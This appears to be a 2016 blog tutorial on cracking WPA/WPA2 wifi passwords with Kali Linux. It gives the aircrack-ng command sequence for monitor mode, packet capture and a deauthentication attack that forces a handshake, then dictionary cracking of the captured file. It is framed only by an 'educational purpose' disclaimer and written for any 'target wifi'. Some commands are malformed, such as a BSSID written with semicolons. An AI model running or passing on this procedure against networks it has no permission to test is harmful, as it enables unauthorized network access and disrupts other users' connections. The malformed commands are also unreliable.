Monday 14 March 2016

How to hack a WPA/WPA2 wifi network using kali Linux (dictionary attack)

hello guys ....today gonna show you guys how to hack a wpa/wpa2 wifi network....




NOTE ; FOR EDUCATIONAL PURPOSE ONLY!!!!!!



things u need :

1. kali linux ( u can download it from www.kali.org )

2. a  WiFi adapter ( i m using tp-link)

3. a WiFi network

4. a wordlist ( you can create a wordlist using crunch command)


procedure 


step 1
. open terminal




step 2. TYPE :

    airmon-ng
                              

                                 
                                         my preferred network adapter is listed as wlan1( u should                                                              replace wlan1  as per your list like wlan0 etc)

step 3. TYPE:

   airmon-ng check kill


step 4. TYPE:
     
    airmon-ng start wlan 1 ( you should replace wlan1 with your network adapter )

                                   


this command sets my network adapter to monitor mode
and named it wlan1mon

step 5. TYPE:

    airodump-ng wlan1mon


      

i am gonna hack my wifi network named "WIFI"

(press ctrl+c after you c your target wifi in the list)

step 6 :now we have to select our target wifi network for that :

           TYPE  
              
    airodump-ng -c <channel no> --bssid <bssid of target wifi> -w /root/Desktop/wlan1mon

            note replace "channel no" by the channel no of the target wifi and "bssid of target                            wifi" by the bssid of your target wifi network .....and remove "< >".
            4 files will be created after executing this command 

            for me command will be like :

        airodump-ng -c 6 --bssid 00:EB;20:64;62:28 -w /root/Desktop/ wlan1mon

step 7 : now we have to wait for wpa handshake to get captured 
      
             to speed up the process 
             open new terminal and
             TYPE:

             aireplay-ng -0 10 -a <bssid>  wlan1mon

             for me :

            aireplay-ng -0 10 -a 00:EB;20:64;62:28 wlan1mon


step 8 : OPEN previous terminal ( airodump terminal ) wpa handshake will be there in                    upper right part of the terminal 
             \
              

wpa handshake is a password in encrypted form...
now we have to crack it!!!!!!!
press ctrl+c


step 7 ; TYPE

             aircrack-ng -a2 -b <bssid>  -w <path of your wordlist > /root/Desktop/*.cap 

             for me:

  aircrack-ng -a2 -b 00:EB;20:64;62:28 -w /root/Desktop/wordlist.txt /root/Desktop/*.cap
  

                                                          HIT ENTER!!!!!!
aircrack will start cracking your target wifi password.....it is a long process which depends on your wordlist ..........

U CAN ALSO VISIT :- 

For any doubt you can place a comment....i will reply you as soon as possible....!!!!

                                                            

                                         THANK U!!!!!

     
  

  
















0 comments:

Post a Comment